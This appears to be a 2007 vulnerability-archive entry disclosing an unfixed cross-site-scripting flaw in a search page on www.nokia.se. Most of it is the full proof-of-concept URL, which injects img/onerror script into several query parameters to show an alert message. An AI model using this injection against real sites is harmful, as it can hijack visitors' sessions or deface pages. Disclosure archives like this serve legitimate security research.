Security researcher Babaconda, has submitted on 14/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.nokia.se, which at the time of submission ranked 78475 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 14/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 14/09/2007 |
Date published: 14/09/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Babaconda |
Domain: www.nokia.se |
Category: XSS |
Pagerank: 78475 |
|---|
URL: http://www.nokia.se/about/press/search.php?search=1&fromYear=%22%3E%3Cimg%20src=http://www.thisiteis
ntsite.com?%20onerror=alert(String.fromCharCode(88,115,115,101,100,32,98,121,32,66,97,98,97,99,111,1
10,100,97,32,61,41))%3E&fromMonth=%22%3E%3Cimg%20src=http://www.thisiteisntsite.com?%20onerror=alert
(String.fromCharCode(88,115,115,101,100,32,98,121,32,66,97,98,97,99,111,110,100,97,32,61,41))%3E&toY
ear=&toMonth=%22%3E%3Cimg%20src=http://www.thisiteisntsite.com?%20onerror=alert(String.fromCharCode(
88,115,115,101,100,32,98,121,32,66,97,98,97,99,111,110,100,97,32,61,41))%3E&category_name=%22%3E%3Ci
mg%20src=http://www.thisiteisntsite.com?%20onerror=alert(String.fromCharCode(88,115,115,101,100,32,9
8,121,32,66,97,98,97,99,111,110,100,97,32,61,41))%3E&search_string=%22%3E%3Cimg%20src=http://www.thi
siteisntsite.com?%20onerror=alert(String.fromCharCode(88,115,115,101,100,32,98,121,32,66,97,98,97,99
,111,110,100,97,32,61,41))%3E&GO=GO |
|
Click here to view the mirror
|
|
|
